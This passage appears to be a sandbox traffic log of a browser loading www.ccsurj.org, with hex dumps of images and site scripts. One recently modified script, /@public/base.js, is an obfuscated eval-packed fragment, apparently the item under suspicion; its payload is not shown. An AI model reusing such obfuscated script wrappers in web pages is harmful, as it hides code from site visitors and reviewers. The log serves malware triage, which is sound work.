                                          2025-01-12 00:16:59 UTC13225INData Raw: 63 6d 61 73 63 72 69 70 74 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 65 63 6d 61 73 63 72 69 70 74 22 7d 2c 63 6f 6e 74 65 6e 74 73 3a 7b 73 63 72 69 70 74 3a 2f 6a 61 76 61 73 63 72 69 70 74 7c 65 63 6d 61 73 63 72 69 70 74 2f 7d 2c 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 74 65 78 74 20 73 63 72 69 70 74 22 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 67 6c 6f 62 61 6c 45 76 61 6c 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 7d 7d 29 2c 66 2e 61 6a 61 78 50 72 65 66 69 6c 74 65 72 28 22 73 63 72 69 70 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 61 63 68 65 3d 3d 3d 62 26 26 28 61 2e 63 61 63 68 65 3d 21 31 29 2c 61 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 26 26 28 61 2e 74 79 70 65 3d 22 47 45 54 22 2c 61 2e 67 6c 6f 62 61 6c 3d 21 31 29 7d 29 2c 66
                                          Data Ascii: cmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.449760154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:58 UTC609OUTGET /images/ico_search.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/style/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: image/png
                                          Content-Length: 541
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          ETag: "6780c676-21d"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC541INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 13 08 06 00 00 00 72 50 36 cc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 81 49 44 41 54 38 cb 9d d4 3b 6b 54 51 14 05 e0 2f f3 20 89 44 63 20 8e 88 af 42 c6 46 cc a3 09 62 9a a0 08 76 fe 01 ff 82 8f 9f 60 65 6d 0a 3b 7f 82 85 08 5a 09 6a 93 10 52 04 62 21 71 0a 8b 51 49 31 82 af e0 c8 4c 46 8b bb 23 67 ae 33 93 31 ab 39 7b dd bb ce 62 9f bd f7 39 23 7a e3 08 ce a3 12 fc 23 de e1 a7 01 18 c9 f1 09 dc c0 7c 0f 6d 1b eb 78 82 dd fd
                                          Data Ascii: PNGIHDRrP6gAMAa cHRMz&u0`:pQ<bKGDCpHYs~IDAT8;kTQ/ Dc BFbv`em;ZjRb!qQI1LF#g319{b9#z#|mx


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.449761154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:58 UTC595OUTGET /images/logo-xxgcxy.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC302INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 60109
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          ETag: "6780c675-eacd"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC16082INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 30 00 00 00 52 08 06 00 00 00 4a 52 ee 17 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1f 74 45 58 74 53 6f 66 74 77 61 72 65 00 4d 61 63 72 6f 6d 65 64 69 61 20 46 69 72 65 77 6f 72 6b 73 20 38 b5 68 d2 78 00 00 02 78 70 72 56 57 78 9c ed 99 4d 68 13 41 18 86 67 33 69 6c 9a c9 66 b3 14 f4 2e de 2b b9 14 a4 d0 28 68 ed 41 bd 14 7f c0 8b f6 07 51 41 c9 41 2a 5e 3c 09 c5 83 68 50 57 0f 9e 84 5a 09 48 ac 62 43 4d 69 b4 16 c2 16 44 45 85 22 8d 15 8d 1e a4 fe a0 37 33 7e bb cd 41 9a 05 51 bb b3 95 be cf ec 3b 4b 96 25 cf ec 7c c3 24 21 e5 5a 71 81 1d 63 6b a5 83 4d 4d da d4 5b d2 b2 a5 65 d9 ee 25 17 8b 9a 4d 57 ac 7e bb 9f 8e 94
                                          Data Ascii: PNGIHDR0RJRsBIT|dpHYs~tEXtSoftwareMacromedia Fireworks 8hxxprVWxMhAg3ilf.+(hAQAA*^<hPWZHbCMiDE"73~AQ;K%|$!ZqckMM[e%MW~
                                          2025-01-12 00:16:59 UTC16384INData Raw: ac ce ea e7 46 6e e3 5f d2 cf 1a 43 7b e6 19 8c 6d 55 7a a7 7e 88 e5 75 ef ef a5 2b a8 57 29 5a a7 e3 68 6c d5 f9 3c e6 7a 90 f9 ef d9 6c 5d 95 b0 51 9f ce b4 91 3b 1f eb 79 5c ef 22 7c 0e 97 8c bd 8d bf e6 a1 b7 2b 64 fc 90 93 5e ca 7f 1f 55 8a e8 c7 2f b9 bd af f2 7e 1d e5 76 dd f7 67 ac 68 9f 1d bb 5b cf fe b6 8d 47 ce 90 7e 3f ae fb fc 52 f3 bf da 68 fb cb e5 c7 92 e8 3c f5 aa 58 ee 6d e3 24 f7 f3 57 b3 50 b6 49 fe b6 b1 18 17 ea 2c 61 d7 f7 47 7c b6 e4 ff ab ec 1f 73 51 06 63 ab cf c9 b0 d0 bf 15 dd 3f 1f 8d ea 1b f5 da e2 ff 36 a3 7b 98 29 bb 76 66 ec 37 da a0 3e 9d 3b 3f d4 f2 2f 0e 73 77 3c 56 f6 9e 03 ac 1d b1 4f 3f af a9 0f fc 3c d4 ca ed 79 a8 5b e8 63 4b 9c 96 f4 b5 32 17 bb 39 bf e6 a4 9d 29 bb 76 7e c8 d5 7b 04 f5 69 ee 79 90 bc 94 ce c1 5c
                                          Data Ascii: Fn_C{mUz~u+W)Zhl<zl]Q;y\"|+d^U/~vgh[G~?Rh<Xm$WPI,aG|sQc?6{)vf7>;?/sw<VO?<y[cK29)v~{iy\
                                          2025-01-12 00:16:59 UTC16384INData Raw: 20 1e 65 e4 fd 27 ef 3d 8a d6 f8 3f 85 cd 98 6f e9 e7 f9 6e 80 ed b1 61 f6 eb ec 9b f4 bd 7c 37 18 8d 15 f9 3e 9a fd 3f c7 90 f4 55 96 25 cb 3b ab ef 12 8f a2 ad fc 8f 2f f1 6d f6 b5 9e 4e 7f 2f e8 e3 49 8e b5 d9 f7 66 f3 51 d6 83 fc 7a 7b c8 f1 3c d3 64 cc e9 36 e9 64 99 6e f9 3b e8 af da ca ff a5 b2 51 be 03 96 6d fb 7b 7b f7 35 ed 24 fd c0 fb 04 69 d1 a6 78 e6 14 ff 67 3c c6 24 f2 22 cd 5e be 25 3d ea fc af 94 52 4a 29 a5 9e 53 97 da e7 cd 74 ef 65 2f f9 d6 94 eb 20 97 b0 61 7d 1b cd be 6b fa f7 d4 5f b5 f6 79 b5 3f ac 39 d4 9a c9 6c cd 7a 8d d2 ff 7d 6d 23 bf f3 47 df fc 4b 6b 21 ac 9b f4 f3 6b 28 cb 39 ea 47 fc e3 31 bb bf 94 de e8 7a 96 d7 2c ad 51 bf 26 ee 6c cd 69 56 e6 bf 8a fd b2 dc fb 23 5f d6 3c f2 9c f6 c2 33 b9 ce 9e 6d 24 f7 5e 39 67 0d 97
                                          Data Ascii: e'=?ona|7>?U%;/mN/IfQz{<d6dn;Qm{{5$ixg<$"^%=RJ)Ste/ a}k_y?9lz}m#GKk!k(9G1z,Q&liV#_<3m$^9g
                                          2025-01-12 00:16:59 UTC11259INData Raw: 0b 10 0d d0 5d c8 cb 6c 29 42 2e b6 23 9a 9d ae 88 1f 94 6e a2 ea 83 68 bf b2 09 24 99 15 5a 3f 98 51 88 f4 53 f0 43 fc 32 42 50 fe 45 f3 fc 20 3e d0 d2 e9 1a 9b 78 ad 1d 3b 9a b8 ae 16 f1 23 32 6b 27 bd 08 d1 bc 1c 69 d7 2d 04 f6 7f 3c 32 0e 9a 22 95 c7 03 2e c2 c7 08 99 8d 31 43 cf c2 10 0c 43 91 67 64 28 42 62 86 d0 10 eb 69 5b 2d 88 cb f4 3b 33 e8 9c ee 03 93 81 d1 8e ec 36 2c 3b 14 72 31 34 0a a1 fa 6e 29 6d 13 47 c4 85 31 9e 93 10 b2 30 2b 4c 99 10 48 16 74 cc c1 20 9b fa 8a a0 b6 80 4e 80 b2 10 6d c6 0a 1a 6a 61 92 30 f6 1d 9a 46 a0 3f 8c 6e 82 6b 4b 73 cd 0a 02 1d 94 cb 30 62 ba 84 23 b7 66 3f af 13 0e ba 09 a9 b3 2d 32 0a bf db 83 cd d9 dc f5 44 e0 ad ae c6 5b 5e de 2c 13 92 0f 48 1c 3c 88 68 53 98 fe a2 d5 ab f1 49 f9 f8 3d 1e f2 bf ff 9e ed 59
                                          Data Ascii: ]l)B.#nh$Z?QSC2BPE >x;#2k'i-<2".1CCgd(Bbi[-;36,;r14n)mG10+LHt Nmja0F?nkKs0b#f?-2D[^,H<hSI=Y


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.449764154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC541OUTGET /system/resource/js/base64.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 4749
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-128d"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC4749INData Raw: 2f 2a 2a 20 20 0d 0a 2a 20 20 0d 0a 2a 20 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 20 2f 20 64 65 63 6f 64 65 20 20 0d 0a 2a 20 20 e6 96 87 e5 ad 97 e9 87 87 e7 94 a8 55 54 46 2d 38 e6 96 b9 e5 bc 8f e8 bf 9b e8 a1 8c 42 61 73 65 36 34 e7 bc 96 e7 a0 81 0d 0a 2a 20 20 0d 0a 2a 2f 20 20 0d 0a 20 20 20 20 0d 0a 66 75 6e 63 74 69 6f 6e 20 42 61 73 65 36 34 28 29 20 7b 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 2f 2f 20 70 72 69 76 61 74 65 20 70 72 6f 70 65 72 74 79 20 20 20 0d 0a 20 20 20 20 5f 6b 65 79 53 74 72 20 3d 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 3b 20 20 20 0d 0a 20 20 20 20 0d 0a
                                          Data Ascii: /** * * Base64 encode / decode * UTF-8Base64* */ function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.449763154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC543OUTGET /system/resource/js/formfunc.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1356
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c676-54c"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC1356INData Raw: ef bb bf 2f 2a e6 8c 89 e9 92 ae e4 b9 8b e7 b1 bb e7 9a 84 e6 8f 90 e4 ba a4 e6 97 b6 64 69 73 61 62 6c 65 64 2c 20 e7 84 b6 e5 90 8e e6 8f 90 e4 ba a4 e5 ae 8c e6 88 90 e8 87 aa e5 8a a8 65 6e 61 62 6c 65 3b 20 e7 94 a8 e5 9c a8 e6 8f 90 e4 ba a4 e5 8a a8 e4 bd 9c e5 8f 91 e7 94 9f e5 89 8d 2c 20 e5 a6 82 20 6f 6e 73 75 62 6d 69 74 20 e4 b8 ad 0d 0a e7 94 a8 e6 b3 95 e4 b8 be e4 be 8b ef bc 9a 20 e5 8f 82 e8 a7 81 e6 9c ac e7 9b ae e5 bd 95 66 6f 72 6d 66 75 6e 63 64 65 6d 6f 2e 68 74 6d 0d 0a 2a 2f 0d 0a 66 75 6e 63 74 69 6f 6e 20 56 73 62 46 6f 72 6d 46 75 6e 63 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 5f 74 68 69 73 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 5f 74 68 69 73 2e 64 69 73 61 62 6c 65 41 75 74 6f 45 6e 61 62 6c 65 20 3d 20 66 75 6e 63
                                          Data Ascii: /*disabled, enable; , onsubmit formfuncdemo.htm*/function VsbFormFunc(){ var _this = this; _this.disableAutoEnable = func


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.449766154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC367OUTGET /system/resource/js/counter.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1329
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-531"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC1329INData Raw: ef bb bf 76 61 72 20 5f 6a 73 71 5f 69 6d 61 67 65 20 3d 20 6e 65 77 20 49 6d 61 67 65 28 29 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 6a 73 71 5f 65 6e 63 6f 64 65 28 29 7b 5f 6b 65 79 53 74 72 3d 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 3b 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 61 3d 3d 22 22 29 72 65 74 75 72 6e 22 22 3b 76 61 72 20 62 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 76 61 72 20 63 2c 63 68 72 32 2c 63 68 72 33 3b 76 61 72 20 64 2c 65 6e 63 32 2c 65 6e 63 33 2c 65 6e 63 34 3b 76 61
                                          Data Ascii: var _jsq_image = new Image();function _jsq_encode(){_keyStr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";this.encode=function(a){if(a==null||a==undefined||a=="")return"";var b=new Array();var c,chr2,chr3;var d,enc2,enc3,enc4;va


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.449767154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC353OUTGET /@public/base.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 2363
                                          Last-Modified: Sat, 11 Jan 2025 07:29:15 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "67821dcb-93b"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC2363INData Raw: 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 64 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 28 63 3c 61 3f 22 22 3a 65 28 70 61 72 73 65 49 6e 74 28 63 2f 61 29 29 29 2b 28 28 63 3d 63 25 61 29 3e 33 35 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 2b 32 39 29 3a 63 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 29 7d 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 64 5b 65 28 63 29 5d 3d 6b 5b 63 5d 7c 7c 65 28 63 29 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 3b 7d 3b 77 68 69 6c 65 28 63 2d
                                          Data Ascii: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c-


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.449762154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC544OUTGET /system/resource/js/dynclicks.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3504
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c676-db0"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC3504INData Raw: ef bb bf 66 75 6e 63 74 69 6f 6e 20 5f 64 79 6e 43 6c 69 63 6b 73 5f 61 6a 61 78 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 78 6d 6c 68 74 74 70 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 74 72 79 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 78 6d 6c 68 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 63 61 74 63 68 28 65 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 0d 0a 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 68 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 73 78 6d 6c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d
                                          Data Ascii: function _dynClicks_ajax(){ var xmlhttp = null; try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.449765154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC612OUTGET /images/21/11/25/1p6vg4xelj/banner-5.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 248821
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-3cbf5"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:59 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 00 01 02 09 0a ff c4 00 60 10 00 01 03 03 02 04 04 03 05 05 04 05 08 05 02 17 02 01 03 04 05 06 11 00 12 07 13 21 31 08 14 22 41 32 51 61 15 23 42 71 81
                                          Data Ascii: JFIFHHCCx`!1"A2Qa#Bq
